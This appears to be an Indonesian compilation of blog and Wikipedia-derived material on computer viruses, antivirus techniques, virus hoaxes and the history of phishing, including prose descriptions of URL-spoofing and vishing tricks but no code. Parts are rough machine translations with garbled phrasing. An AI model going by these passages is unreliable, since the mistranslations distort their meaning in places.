1998 Kemunculan virus Java pertama, Strange Brew. Back Orifice merupakan trojan pertama yang dapat digunakan sebagai tool untuk mengambil alih kendali komputer remote melalui Internet. Pada tahun ini, virus-virus macro lainnya bermunculan.

1999 Kemunculan virus Melissa yang merupakan kombinasi antara virus macro yangmenyerang aplikasi Microsoft Word dan worm yang menggunakan address bookpada aplikasi Microsoft Outlook dan Oulook Express untuk mengirimkan dirinya sendiri melalui email. Virus Corner merupakan virus pertama menyerang file-file aplikasi MS Project. Virus Tristate merupakan virus macro yang bersifat multi-program menyerang aplikasi Microsoft Word, Excel, dan PowerPoint. Bubbleboy merupakan worm pertama yang dapat aktif hanya dengan membuka email melalui aplikasi Microsoft Outlook tanpa memerlukan attachment.

2000 Serangan Distributed Denial of Service (DDoS) pertama membuat kerusakan pada situs-situs besar seperti Yahoo!, Amazon.com, dan lain-lain. Love Letter merupakan worm dengan kecepatan menyebar tertinggi pada saat itu yang menyebabkan kerusakan pada banyak sistem email di seluruh dunia. Liberty Crack yang merupakan worm pertama untuk peralatan PDA.

2001 Gnuman (Mandragore) merupakan worm pertama yang menyerang jaringan komunikasi peer to peer. Worm ini menyamarkan diri dalam bentuk file MP3 yang dapat di download. Kemunculan virus yang didesain untuk menyerang baik sistem operasi Windows maupun Linux, seperti Winux atau Lindose. Virus LogoLogic-A menyebar melalui aplikasi MIRC dan e-mail.

2002 Virus LFM-926 merupakan virus pertama yang menyerang file-file aplikasi Shockwave Flash. Donut merupakan worm pertama yang menyerang .NET services. SQLSpider merupakan worm yang menyerang aplikasi yang menggunakan teknologi Microsoft SQL Server.

Klasifikasi Virus KomputerBerikut adalah contoh klasifikasi dari berbagai jenis harmful program :

1. Malware: merupakan singkatan dari malicious software, merujuk pada program yang dibuat dengan tujuan membahayakan atau menyerang sebuah sistem komputer. Terdiri atas virus komputer (computer viruses), computer worms, trojan horses, joke programs dan malicious toolkits.

2. Computer virus: merujuk pada program yang memiliki kemampuan untuk bereplikasi dengan sendirinya.

3. Computer worm: merujuk pada program independen yang memiliki kemampuan untuk bereplikasi dengan sendirinya. Indepen di sini memiliki makna bahwa worm tidak memiliki

host program sebagaimana virus, untuk ditumpangi. Sering kali worm dikelompokan sebagai sub-kelas dari virus komputer.

4. Trojan horse: merujuk pada program independen yang dapat mempunyai fungsi yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif.

5. Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahyakan sebuah sistem komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk membantu proses hacking.

6. Joke program: merujuk pada program yang meniru operasi-operasi yang dapat membahayakan sistem komputer, namun sebenarnya dibuat untuk tujuan lelucon dan tidak mengandung operasi berbahaya apapun.Penyebaran Virus Komputer

1. Boot Sector VirusSebuah PC terinfeksi oleh boot sector virus jika PC tersebut di-boot atau di-re-boot dari floppy disk yang telah terinfeksi oleh virus jenis ini. Boot sector virus cenderung tidak menyebar melalui jaringan komputer, dan biasanya menyebar akibat ketidaksengajaan penggunaan floppy disk yang telah terinfeksi.

2. File virusVirus jenis ini menginfeksi file lain ketika program yang telah terinfeksi olehnya dieksekusi. Oleh sebab itu virus jenis ini dapat menyebar melalui jaringan komputer dengan sangat cepat.

3. Multiparte virusVirus jenis ini menginfeksi baik boot sector mau pun file jenis lain.

4. Macro virusMacro adalah perintah yang berisi perintah program otomatis. Saat ini, banyak aplikasi umum yang menggunakan macro. Jika seorang pengguna mengakses sebuah dokumen yang mengandung macro yang telah terinfeksi oleh virus jenis ini dan secara tidak sengaja mengeksekusinya, maka virus ini dapat meng-copy dirinya ke dalam file startup dari aplikasi tersebut. Sehingga komputer tersebut menjadi terinfeksi dan sebuah copy dari macro virus tersebut akan tinggal di dalamnya.Dokumen lain di dalam komputer tersebut yang menggunakan aplikasi yang sama akan terinfeksi pula. Dan jika komputer tersebut berada di dalam sebuah jaringan, maka kemungkinan besar virus ini dapat menyebar dengan cepat ke komputer lain yang berada di dalam jaringan tempat komputer tersebut berada. Bahkan jika dokumen yang telah terinfeksi dikirimkan kepada orang lain, misalnya melalui floppy disk ataupun email, maka virus akan menjangkiti komputer penerima pula. Proses ini akan berakhir hanya apabila jika virus ini telah diketahui dan seluruh macro yang terinfeksi dibasmi. Macro virus merupakan salah satu jenis virus yang paling umum saat ini. Aplikasi seperti Microsoft Word dan Microsoft Excel tergolong sangat rentan terhadap virus jenis ini. Satu hal yang membuat

penyebaran virus ini menjadi sangat ‘sukses’ adalah karena aplikasi jenis ini kini lebih umum dipertukarkan pengguna dibandingkan file-file program, dan juga merupakan dampak langsung maraknya penggunaan aplikasi email dan web dewasa ini.

5. Email wormSebagian besar penyebab penyebaran virus saat ini adalah attacment email yang telah terinfeksi. Kemudahan pengguna untuk mendownload attachment email tersebut dan mengeksekusinya. Hal ini dikarenakan sering kali isi email yang bersangkutan bersifat ‘mengundang’, misalnya saja untuk kasus worn ILoveYou yang menyebar dengan nama file LOVE-LETTER-FOR-YOU.TXT.vbs disertai dengan pesan yang berbunyi: “kindly check the attached LOVELETTER coming from me”. Selain melalui email, worm juga dapat menyebar melalui newsgroup posting.

Tanda-Tanda/Ciri-Ciri Komputer Kita Terkena/Terinfeksi Virus Komputer :– Komputer berjalan lambat dari normal- Sering keluar pesan eror atau aneh-aneh- Perubahan tampilan pada komputer- Media penyimpanan seperti disket, flashdisk, dan sebagainya langsung mengkopi fileaneh tanpa kita kopi ketika kita hubungkan ke komputer.- Komputer suka restart sendiri atau crash ketika sedang berjalan.- Suka muncul pesan atau tulisan aneh- Komputer hang atau berhenti merespon kita.- Harddisk tidak bisa diakses- Printer dan perangkat lain tidak dapat dipakai walaupun tidak ada masalah hardwaredan software driver.- Sering ada menu atau kotak dialog yang error atau rusak.- Hilangnya beberapa fungsi dasar komputer.- Komputer berusaha menghubungkan diri dengan internet atau jaringan tanpa kita suruh.

Pencegahan Virus Komputer

Anti Virus SoftwareAnti-virus software adalah sebuah program komputer yang digunakan untuk memeriksa file-file dengan tujuan mengidentifikasi dan menghapus virus komputer dan malware lainnya. Pada saat ini ada tiga jenis teknologi anti virus yang lazimnya digunakan, yaitu: scanners, monitors, dan integrity checkers. Beberapa contoh Anti Virus , yaitu :

1. ScannersScanners adalah program yang memeriksa file–file executable untuk menemukan rangkaian kode yang merupakan bagian dari komputer virus yang telah diketahui sebelumnya. Pada saat ini scanners adalah jenis program anti virus yang paling banyak digunakan dengan alasan kemudahan dalam proses maintenance (pemeliharaan).

Pada dasarnya scanners terdiri atas:- Search Engine- Database yang berisi rangkaian kode sekuensial dari virus yang telah diketahui sebelumnya (sering kali disebut juga virus signatures atau scan strings).

Jika sebuah virus baru ditemukan, maka database akan di-update dengan signature yang dimiliki hanya oleh virus tersebut dan tidak terdapat di dalam program lainnya. Hal ini dapat dilakukan tanpa memerlukan pemahaman yang ebih jauh mengenai virus tersebut. Beberapa kelemahan yang dimiliki scanners adalah: – Scanners harus tetap dijaga agar up-to-date secara terus menerus karena scannershanya dapat mendeteksi virus yang telah diketahui sebelumnya. – Scanners cenderung rentan terhadap virus polymorphic yang memiliki kemampuan untuk mengubah/mengkodekan dirinya sendiri sehingga terlihat berbeda pada setiap file yang terinfeksi. Hal ini dapat diatasi dengan memahami mutation engine yang terdapat di dalam virus tersebut secara mendetail. – Proses scanning yang dilakukan dalam mendeteksi keberadaan virus-virus cenderung bersifat time-consuming, mengingat keberadaan virus-virus, worms, dan Trojan horses dengan jumlah yang luar biasa banyaknya

2. MonitorsMonitors adalah program yang ‘tinggal’ (besifat residensial) di dalam memory komputer untuk secara terus menerus memonitor fungsi dari sistem operasi yang bekerja. Pendeteksian sebuah virus dilakukan dengan memonitor fungsi-fungsi yang diindikasikan berbahaya dan memiliki sifat seperti sebuah virus, seperti merubah isi dari sebuah file yang executable dan tindakan-tindakan yang mem-bypass sistem operas. Ketika sebuah program mencoba melakukan hal-hal di atas, maka monitors akan memblok eksekusi dari program tersebut. Tidak seperti halnya scanners, monitors tidak memerlukan update secara terus menerus. Namun kelemahan utama dari monitors adalah kerentanan terhadap virus tunneling yang memiliki kemampuan untuk mem-bypass program monitors. Hal ini dikarenakan pada sistem operasi PC pada umumnya, sebuah program yang sedang dieksekusi (termasuk sebuah virus) memiliki akses penuh untuk membaca dan mengubah daerah manapun di dalam memori komputer bahkan yang merupakan bagian dari sistem operasi tersebut sehingga monitors yang juga merupakan bagian dari memori komputer dapat dilumpuhkan. Kelemahan porgram monitors lainnya adalah kesalahan yang kerap kali dilakukannyamengingat pendeteksian virus didasarkan pada kelakuan-kelakuan seperti yang disebutkan di atas, sehingga kerap kali fungsi dari sebuah program lain (yang bukan merupakan virus komputer) dianggap sebagai sebuah virus.

3. Integrity CheckersIntegrity checkers adalah program yang mampu mendeteksi objek executable lain yang telah dimodifikasi dan mendeteksi infeksi dari sebuah virus. Integrity checkers bekerja dengan cara menghitung checksum (menghitung integritas) dari kode-kode program yang executable dan menyimpannya di dalam sebuah database. Kemudian secara periodic checksum dari program-program tersebut akan dihitung ulang dan dibandingkan dengan database checksum tersebut. Beberapa pakar menilai bahwa database checksum ini harus dilalui proses kriptografi setelah proses perhitungan checksum selesai, untuk menghindari usaha modifikasi yang dapat dilakukan oleh virus komputer.

Pada saat ini terdapat beberapa jenis integrity checkers: Off-line integerity checkers: perlu di-run terlebih dahulu untuk memeriksa checksum dari seluruh kode executable yang terdapat di dalam sistem komputer ybs. Integrity checkers yang bekerja dengan cara membuat modul-modul yang akan diattach pada file executable dengan bantuan program

khusus tertentu. Sehingga bila file executable tersebut dijalankan, ia akan melakukan proses perhitungan checksumnya sendiri. Namun hal ini memiliki kekurangan karena tidak seluruh file executable dapat diperlakukan seperti ini, dan integrity checkers jenis ini dapat dengan mudah di-bypass oleh virus steath.

Jenis terakhir dari integrity checkers yang bersifat residensial (mendiami) memori dan akan melakukan perhitungan ketika objek executable dieksekusi.

Integrity checkers tidak bersifat virus-specific sehingga tidak memerlukan update secara terus menerus seperti scanners. Selain itu karena integrity checkers tidak berusaha memblok kerja dari virus komputer seperti halnya monitors, maka integrity checkers tidak dapat di-bypass oleh virus tunneling.

Beberapa kekurangan yang dimiliki integrity checkers:

Integrity checkers tidak memiliki kemampuan untuk mencegah proses penginfeksian oleh sebuah virus. Ia hanya dapat mendeteksi dan melaporkan hasil pendeteksian yang dilakukannya tersebut.

Integrity checkers pertama kali harus di sistem yang bebas virus, jika tidak maka hasil perhitungan pertama yang dilakukannya merupakan hasil perhitungan yang telah terinfeksi. Sehingga pada umumnya, pada saat proses peng-install-an program integrity checkers dilengkapi dengan scanners untuk memastikan sistem bebas virus.

Integrity checkers rentan terhadap false positive (kesalah indikasi keberadaan viruspada program yang sebenarnya bebas virus) , karena integrity checkers mendeteksiperubahan bukan virus.

Integrity checkers tidak dapat mendeteksi sumber dari infeksi virus, walaupun dapan mendeteksi proses penyebaran virus dan mengidentifikasi objek yang baru terinfeksi.

Integrity checkers rentan terhadap slow viruses, karena slow virus menginfeksi file target ketika file tersebut ditulis ke dalam disk.

Meskipun adanya kekurangan-kekurangan di atas, banyak pakar menganggap integrity checkers sebagai pertahanan yang paling baik terhadap ancaman virus computer dan malware lainnya.

http://roelangga.wordpress.com/2009/06/08/sejarah-pengertian-jenis-jenis-virus/

VIRUSES HOAXES

Sebuah tipuan virus komputer adalah sebuah pesan peringatan penerima yang tidak ada virus komputer ancaman. Pesan biasanya merupakan rantai e-mail yang memberitahu penerima untuk meneruskannya kepada setiap orang yang mereka ketahui.

Kebanyakan hoax yang sensasional di alam dan mudah diidentifikasi oleh fakta bahwa mereka menunjukkan bahwa virus akan melakukan hal-hal yang hampir mustahil, seperti meledakkan komputer penerima dan membakarnya, atau kurang sensasional, hapus semua yang ada di komputer pengguna. Mereka sering termasuk pengumuman mengaku dari organisasi terkemuka seperti Microsoft, IBM, atau sumber berita seperti CNN dan mencakup bahasa emotif dan dorongan untuk meneruskan pesan. Sumber-sumber ini dikutip dalam rangka untuk menambahkan kredibilitas kepada tipuan.

Virus hoax biasanya tidak berbahaya dan tidak mencapai lebih dari mengganggu orang-orang yang mengidentifikasi sebagai tipuan dan menyia-nyiakan waktu orang-orang yang meneruskan pesan. Namun demikian, sejumlah hoax telah memperingatkan pengguna bahwa file sistem penting adalah virus dan mendorong pengguna untuk menghapus file, mungkin merusak sistem. Contoh jenis ini termasuk virus jdbgmgr.exe tipuan dan SULFNBK.EXE tipuan. [1] [2]

Beberapa orang menganggap virus hoax dan lain e-mail berantai menjadi cacing komputer dalam dan dari diri mereka sendiri. Mereka meniru dengan mengeksploitasi pengguna 'ketidaktahuan atau respons emosional.

Hoax tidak boleh disamakan dengan pranks komputer. Pranks adalah program komputer yang melakukan tindakan yang tidak diinginkan dan mengganggu pada komputer, seperti mouse bergerak secara acak.

Anti-virus spesialis setuju bahwa penerima harus menghapus virus hoax ketika mereka menerima mereka, bukannya forwarding mereka. [3] [4]

McAfee mengatakan:

Kami memberikan nasehat kepada pengguna yang menerima email untuk menghapusnya dan TIDAK menyebarkannya karena hal ini adalah bagaimana menyebarkan email HOAX. [3]

F-Secure menyarankan:

Jangan maju pesan tipuan.

Hoax peringatan peringatan menakut-nakuti biasanya dimulai oleh orang-orang jahat - dan diteruskan oleh individu yang tidak bersalah yang berpikir bahwa mereka membantu masyarakat dengan menyebarkan peringatan.

Perusahaan pengguna dapat menyingkirkan masalah dengan hanya tipuan menetapkan pedoman perusahaan yang ketat: Akhir pengguna harus tidak maju virus alarm. Selalu. Ini bukan pekerjaan seorang pengguna akhir tetap. Jika pesan yang diterima tersebut, pengguna akhir dapat meneruskannya ke departemen IT tapi tidak untuk orang lain. [4]

Nama Alias (es) Asal Author Deskripsi

AIDS (none) Unknown Unknown

Jangan disamakan dengan AIDS (virus komputer) atau AIDS (kuda trojan), tipuan ini adalah tentang yang tidak ada virus yang konon didistribusikan melalui elektronik mail yang telah "BUKA: SANGAT COOL!:)" Sebagai subjek.

Antikristus (none) Monmouth (uk)

Dylan Nicholas

Ini adalah tipuan yang memperingatkan tentang virus yang seharusnya ditemukan oleh Microsoft dan McAfee bernama "Antikristus", memberitahu pengguna bahwa ia terinstal melalui e-mail dengan baris subjek: "KEJUTAN ?!!!!!!!!!! " setelah itu menghancurkan zeroth sektor dari hard disk, rendering itu tidak bisa digunakan. [5]

Budweiser Frogs BUDSAVER.EXE Unknown Unknown

Seharusnya akan menghapus hard drive pengguna dan mencuri nama layar pengguna dan password. [6]

Goodtimes virus

(none) Unknown Unknown Peringatan tentang virus komputer bernama "Good Times" yang mulai diedarkan di kalangan pengguna Internet pada tahun 1994. Goodtimes virus yang seharusnya dikirim melalui email header bantalan subjek "Good Times" atau "Goodtimes," maka nama virus, dan peringatan direkomendasikan menghapus email tersebut

belum dibaca. Virus yang dijelaskan dalam peringatan tidak ada, tetapi peringatan itu sendiri, adalah, pada dasarnya, virus seperti. [7]

Undangan lampiran (tipuan virus komputer)

(Allright sekarang / aku hanya sayin)

Michiana Shores, Long Beach, Jamestown Manor, Michigan City (IN), Schaumburg (IL)

Jim Flanagan

Undangan yang terlibat tipuan virus e-mail spam pada 2006 yang menyarankan pengguna komputer untuk menghapus email, dengan semua jenis lampiran yang menyatakan "undangan" karena itu adalah virus komputer. Hal ini juga dikenal sebagai Obor Olimpiade virus hoax (lihat di bawah). [8]

Jdbgmgr.exe (bear.a) Unknown Unknown

Tipuan virus yang terlibat jdbgmgr.exe e-mail spam pada tahun 2002 yang menyarankan pengguna komputer untuk menghapus file bernama jdbgmgr.exe karena itu adalah virus komputer. jdbgmgr.exe, yang memiliki sedikit boneka beruang-seperti icon (Microsoft Beruang), sebenarnya yang valid Microsoft Windows file, Debugger Registrar for Java (juga dikenal sebagai Jawa Debug Manager, maka jdbgmgr). [1]

Life is beautiful

Hidup ini indah Unknown Konon, seorang hacker dengan alias "Hidup

Olok-olok itu menyebar melalui Internet sekitar bulan Januari 2001 di Brasil. Ini menceritakan tentang virus dilampirkan ke e-mail, yang tersebar di Internet.

pemilik" atau "Dono da vida"

File terlampir ini seharusnya disebut "Life is beautiful.pps" atau "La vita è bella.pps". [9]

NVISION DESIGN, INC permainan ( "Frogapult," "Elfbowl")

Kadang-kadang mereka yang lain termasuk permainan "Y2KGame"

Unknown Unknown

Program yang sebenarnya, sah permainan komputer; penulis mengklaim bahwa mereka adalah virus yang akan "menghapus" pengguna hard drive pada Hari Natal. [10]

Obor Olimpiade

Postcard Unknown Unknown

Obor Olimpiade adalah tipuan virus komputer yang dikirimkan oleh e-mail. Olok-olok e-mail pertama kali muncul pada Februari 2006. The "virus" yang disebut oleh e-mail tidak benar-benar ada. Kebohongan e-mail penerima memperingatkan wabah baru "Obor Olimpiade" virus, yang terdapat dalam e-mail yang berjudul "Undangan", yang menghapus hard disk komputer pengguna ketika dibuka. Email kebohongan dimaksudkan lebih lanjut virus akan diakui oleh sumber-sumber terkemuka seperti CNN, McAfee dan Microsoft sebagai salah satu virus paling berbahaya belum dilaporkan.

Tentu saja email ini, yang dimulai pada bulan Februari 2006, adalah aman untuk dihapus saat Anda inginkan. [8]

SULFNBK.EXE Peringatan

tak satupun Unknown Unknown SULFNBK.EXE (kependekan dari Setup Utility untuk Long File Name Cadangan) adalah

komponen internal dari sistem operasi Microsoft Windows (pada Windows 98 dan Windows Me) untuk memulihkan nama file yang panjang. Komponen menjadi terkenal pada awal 2000-an sebagai subjek e-mail tipuan. Kebohongan mengklaim bahwa SULFNBK.EXE adalah virus, dan berisi instruksi untuk menemukan dan menghapus file. Sementara instruksi bekerja, mereka perlu dan (dalam beberapa kasus yang jarang terjadi, misalnya, ketika nama file panjang rusak dan perlu dikembalikan) dapat menyebabkan gangguan, seperti tidak SULFNBK.EXE virus, tapi malah komponen sebuah sistem operasi . [2]

Virus hoax telah menjadi bagian dari budaya kedua puluh satu abad dan mudah tertipu dari pengguna komputer pemula yakin untuk menghapus file atas dasar hoax telah diparodikan di beberapa lelucon populer dan lagu.

Salah satu adalah parodi "Weird Al" Yankovic 's lagu "Virus Alert" dari album Straight Outta Lynwood. Lagu-olok membuat klaim berlebihan yang dibuat dalam virus hoax. [11]

Parodi lain virus hoax adalah sistem kehormatan virus yang telah di bawah nama cirulated Amish Computer Virus, manual virus, Musik Komputer Virus, yang Irlandia Virus Komputer, yang Suriah Virus Komputer, di Norwegia Komputer Virus, Newfie Virus, yang Unix Computer virus, yang Mac OS 9 virus, Discount virus dan banyak lainnya. Email lelucon ini mengklaim sebagai ditulis oleh Amish atau serupa lainnya teknologi rendah penduduk yang tidak memiliki komputer, pemrograman keterampilan atau listrik untuk membuat virus dan dengan demikian meminta Anda untuk menghapus isi harddisk sendiri secara manual setelah meneruskan pesan ke teman-teman Anda. [ 12]

The Tuxissa Virus parodi lain virus tipuan, berdasarkan konsep Melissa virus, tetapi dengan tujuan untuk menginstal Linux pada komputer korban tanpa izin pemilik. Cerita mengatakan bahwa hal itu menyebar melalui e-mail, yang terkandung dalam pesan yang berjudul "Pesan Penting Tentang Windows Security". Seharusnya itu pertama-tama menyebarkan virus ke komputer lain, kemudian men-download dilucuti-down versi Slackware dan uncompress itu ke hard disk. Windows Registry akhirnya dihapus dan opsi boot berubah. Lalu menghapus virus itu sendiri ketika reboot komputer di akhir, dengan

menghadap pengguna Linux prompt login dan semua masalah keamanan Windows diselesaikan untuk dirinya.

http://en.wikipedia.org/wiki/Virus_hoax

VOICE PHISING

Sejarah dan status phishing

Sebuah teknik phishing dijelaskan secara rinci pada tahun 1987, dalam sebuah kertas dan presentasi yang disampaikan ke International HP Users Group, Interex. [7] menyebutkan tercatat pertama dari istilah "phishing" adalah pada alt.online-service.America-online usenet newsgroup pada 2 Januari 1996, [8] walaupun istilah mungkin telah muncul sebelumnya dalam edisi cetak majalah hacker 2600. [9]

Phishing di AOL erat terkait dengan warez masyarakat yang dipertukarkan perangkat lunak bajakan dan hacking adegan yang dilakukan penipuan kartu kredit dan kejahatan online lainnya. Setelah AOL membawa langkah-langkah akhir tahun 1995 untuk mencegah menggunakan palsu, algorithmically menghasilkan nomor kartu kredit untuk membuka rekening, AOL kerupuk terpaksa phishing yang sah untuk account [10] dan mengeksploitasi AOL.

Sebuah phisher mungkin berpose sebagai anggota staf AOL dan mengirim pesan instan kepada korban potensial, memintanya untuk mengungkapkan sandi. [11] Dalam rangka untuk memikat korban agar memberi informasi sensitif pesan mungkin termasuk keharusan seperti "memverifikasi account Anda "atau" mengkonfirmasi informasi penagihan ". Setelah korban telah mengungkapkan sandi, penyerang dapat mengakses dan menggunakan akun korban untuk tujuan penipuan atau spam. Baik phishing dan warezing di AOL umumnya diperlukan custom-program yang ditulis, seperti AOHell. Phishing menjadi begitu umum di AOL bahwa mereka menambahkan baris pada semua pesan instan yang menyatakan: "tidak ada yang bekerja di AOL akan meminta sandi atau informasi penagihan", bahkan meskipun hal ini tidak membuat beberapa orang dari mereka pergi memberikan password dan informasi pribadi jika mereka membaca dan percaya pertama IM. Seorang pengguna menggunakan baik suatu account AIM dan AOL account dari ISP secara bersamaan bisa phish anggota AOL dengan Internet relatif impunitas sebagai account AIM dapat digunakan oleh non-anggota internet AOL dan tidak bisa actioned (ie-dilaporkan ke AOL KL departemen untuk disiplin tindakan.)

Setelah tahun 1997, penegakan kebijakan AOL sehubungan dengan phishing dan warez menjadi ketat dan memaksa perangkat lunak bajakan dari server AOL. AOL secara simultan

mengembangkan sebuah sistem untuk segera menonaktifkan account yang terlibat dalam phishing, sering sebelum korban bisa menjawab. Yang mematikan dari warez adegan di AOL menyebabkan sebagian besar phisher untuk meninggalkan pelayanan, dan banyak phisher-sering remaja-muda tumbuh dari kebiasaan. [12]

Penangkapan informasi account AOL mungkin telah membuat phisher untuk menyalahgunakan informasi kartu kredit, dan menyadari bahwa serangan terhadap sistem pembayaran online layak. Pertama yang diketahui usaha langsung terhadap sistem pembayaran terpengaruh E-gold pada bulan Juni 2001, yang diikuti dengan sebuah "post-9/11 id tandai" tidak lama setelah serangan 11 September di World Trade Center. [13] Keduanya telah dilihat pada saat itu sebagai kegagalan, tetapi sekarang dapat dilihat sebagai awal menuju lebih membuahkan hasil percobaan serangan terhadap bank-bank utama. Pada 2004, phishing diakui sebagai industri sepenuhnya bagian dari kejahatan ekonomi: spesialisasi muncul pada skala global yang menyediakan komponen untuk uang tunai, yang dirakit menjadi serangan selesai. [14] [15]

Recent upaya phishing

Sebuah grafik yang menunjukkan peningkatan phishing laporan dari Oktober 2004 hingga Juni 2005

Phisher menargetkan nasabah bank dan layanan pembayaran online. E-mail, seharusnya dari Internal Revenue Service, telah digunakan untuk mengumpulkan data sensitif dari para pembayar pajak AS. [16] Sementara pertama contoh-contoh tersebut dikirim tanpa pandang bulu dengan harapan bahwa beberapa akan diterima oleh pelanggan dari bank tertentu atau layanan, Penelitian terbaru menunjukkan bahwa mungkin pada prinsipnya phisher dapat menentukan mana bank korban potensial digunakan, dan sasaran e-mail palsu yang sesuai. [17] Target versi phishing tombak telah disebut phishing. [18] Beberapa serangan phishing baru-baru ini telah diarahkan khusus di eksekutif senior dan profil tinggi lainnya target dalam bisnis, dan perburuan paus istilah telah diciptakan untuk jenis serangan ini. [19]

Situs jaringan sosial kini menjadi target utama phishing, karena data pribadi di situs tersebut dapat digunakan dalam pencurian identitas; [20] pada akhir tahun 2006 sebuah komputer cacing mengambil alih halaman MySpace dan mengubah link ke peselancar langsung ke situs web yang dirancang untuk mencuri rincian login. [21] Eksperimen menunjukkan tingkat keberhasilan lebih dari 70% untuk serangan phishing pada jaringan sosial. [22]

The RapidShare situs file sharing telah ditargetkan oleh phishing untuk mendapatkan akun premium, yang menghilangkan batas atas kecepatan download, auto-penghapusan Upload, menunggu di download, dan cooldown kali antara mingguan. [23]

Penyerang yang masuk ke TD Ameritrade 's database (berisi semua 6,3 juta pelanggan nomor jaminan sosial, nomor rekening dan alamat email serta nama-nama mereka, alamat, tanggal lahir, nomor telepon dan aktivitas perdagangan) juga ingin account username dan password , jadi mereka meluncurkan lanjutan tombak serangan phishing. [24]

Hampir setengah dari phishing pencurian pada tahun 2006 itu dilakukan oleh kelompok-kelompok yang beroperasi melalui Jaringan Bisnis Rusia yang berbasis di St Petersburg. [25]

Sebagian besar metode phishing menggunakan beberapa bentuk penipuan teknis yang dirancang untuk membuat link dalam e-mail (dan situs web palsu itu mengarah pada) akan muncul untuk menjadi bagian dari organisasi palsu. Eja URL atau penggunaan trik subdomain yang umum digunakan oleh phisher. Pada contoh berikut URL, http://www.yourbank.example.com/, tampak seolah-olah URL yang akan membawa Anda ke bagian contoh website yourbank; sebenarnya URL ini menunjuk pada "yourbank" (yaitu phishing) contoh bagian situs web. Trik umum lainnya adalah membuat anchor text untuk link tampaknya masih berlaku, bila link benar-benar pergi ke phisher 'site. Contoh berikut link, http://en.wikipedia.org/wiki/Genuine, tampaknya membawa Anda ke artikel berjudul "Genuine"; mengkliknya pada kenyataannya akan membawa Anda ke artikel berjudul "Penipuan". Di pojok kiri bawah dari kebanyakan browser Anda dapat melihat pratinjau dan memverifikasi mana link ini akan membawa Anda. [26]

Sebuah metode lama spoofing link yang digunakan mengandung '@' simbol, awalnya dimaksudkan sebagai suatu cara untuk memasukkan username dan password (bertentangan dengan standar). [27] Sebagai contoh, link http://www.google.com @ members.tripod.com / mungkin mengelabui pengamat biasa untuk percaya bahwa itu akan terbuka halaman di www.google.com, sedangkan sebenarnya mengarahkan browser ke halaman di members.tripod.com, menggunakan nama pengguna dari www.google. com: halaman akan terbuka normal, terlepas dari username yang disediakan. URL yang cacat seperti di Internet Explorer, [28] sementara Mozilla Firefox [29] dan Opera menampilkan pesan peringatan dan memberikan pilihan untuk melanjutkan ke situs atau membatalkan.

Masalah lebih lanjut dengan URL yang telah ditemukan dalam penanganan internasionalisasi nama domain (IDN) di web browser, yang memungkinkan alamat web identik visual untuk memimpin yang berbeda, mungkin berbahaya, situs web. Terlepas dari publisitas yang mengelilingi cacat, yang dikenal sebagai IDN spoofing [30] atau serangan homograph, [31] phisher telah mengambil keuntungan dari resiko yang sama, menggunakan buka URL redirectors pada situs-situs organisasi yang dipercaya untuk menyamarkan URL jahat dengan domain yang terpercaya. [ 32] [33] [34] Bahkan sertifikat digital tidak memecahkan masalah ini karena sangat mungkin untuk phisher untuk membeli sertifikat yang valid dan kemudian mengubah konten untuk menipu situs asli.

Filter penghindaran

Phisher telah menggunakan gambar daripada teks yang lebih sulit untuk anti-phishing filter untuk mendeteksi teks biasa digunakan dalam e-mail phishing. [35]

Situs pemalsuan

Setelah korban mengunjungi situs phishing penipuan belum selesai. Beberapa phising menggunakan JavaScript perintah untuk mengubah address bar. [36] Hal ini dilakukan baik dengan menempatkan sebuah gambar dari URL yang sah atas address bar, atau dengan menutup alamat asli bar dan membuka yang baru dengan URL yang sah . [37]

Penyerang bahkan dapat menggunakan kelemahan dalam website yang terpercaya skrip sendiri terhadap korban. [38] Jenis-jenis serangan (dikenal dengan cross-site scripting) sangat bermasalah, karena mereka mengarahkan user untuk sign in di bank mereka sendiri atau jasa web halaman, di mana segala sesuatu dari alamat web ke sertifikat keamanan yang benar muncul. Pada kenyataannya, link ke website ini dibuat untuk melaksanakan serangan, walaupun sangat sulit untuk tempat tanpa pengetahuan khusus. Hanya seperti cacat digunakan pada tahun 2006 melawan PayPal. [39]

Universal Man-in-the-tengah Phishing Kit, ditemukan oleh RSA Security, menyediakan sederhana digunakan antarmuka yang memungkinkan phisher untuk meyakinkan mereproduksi situs dan menangkap log-in detail masuk pada situs palsu. [40]

Untuk menghindari teknik anti-phishing yang memindai phishing website untuk teks terkait, phisher telah mulai menggunakan Flash-based website. Ini terlalu mirip situs web yang sebenarnya, namun menyembunyikan teks dalam objek multimedia. [41]

Telepon phishing

Tidak semua serangan phishing memerlukan situs palsu. Pesan yang mengaku dari bank kepada pengguna untuk menghubungi nomor telepon mengenai masalah dengan rekening bank mereka. [42] Sekali nomor telepon (yang dimiliki oleh phisher, dan yang disediakan oleh Voice over IP service) adalah memutar, mendorong kepada pengguna untuk memasukkan nomor rekening dan PIN. Vishing (voice phishing) kadang-kadang menggunakan caller-ID palsu data untuk memberikan kesan bahwa panggilan berasal dari organisasi yang terpercaya. [43]

Serangan lagi berhasil digunakan adalah untuk maju klien untuk sebuah situs web bank yang sah, lalu untuk menempatkan jendela popup yang meminta identitasnya di atas situs web dengan cara yang tampaknya bank meminta informasi sensitif ini. [44]

Kerusakan yang disebabkan oleh phishing

Kerusakan yang disebabkan oleh phising berkisar dari penolakan akses e-mail ke kerugian finansial yang substansial. Diperkirakan bahwa antara bulan Mei 2004 dan Mei 2005, sekitar 1,2 juta pengguna komputer di Amerika Serikat menderita kerugian akibat phishing, senilai sekitar US $ 929 juta. Bisnis Amerika Serikat kehilangan sekitar US $ 2 miliar per tahun sebagai klien mereka menjadi korban. [45] Pada tahun 2007 serangan phishing meningkat. 3,6 juta orang dewasa kehilangan US $ 3,2 milyar dalam 12 bulan berakhir pada Agustus 2007. [46] Microsoft mengklaim perkiraan ini terlalu berlebihan dan menempatkan kerugian phishing tahunan di AS di $ 60 juta. [47] Di Inggris Raya kerugian dari web penipuan

perbankan kebanyakan dari phishing-hampir dua kali lipat menjadi £ 23.2m pada tahun 2005, dari £ 12.2m pada tahun 2004, [48] sementara 1 dari 20 pengguna komputer mengaku telah kehilangan ke phishing pada 2005. [49]

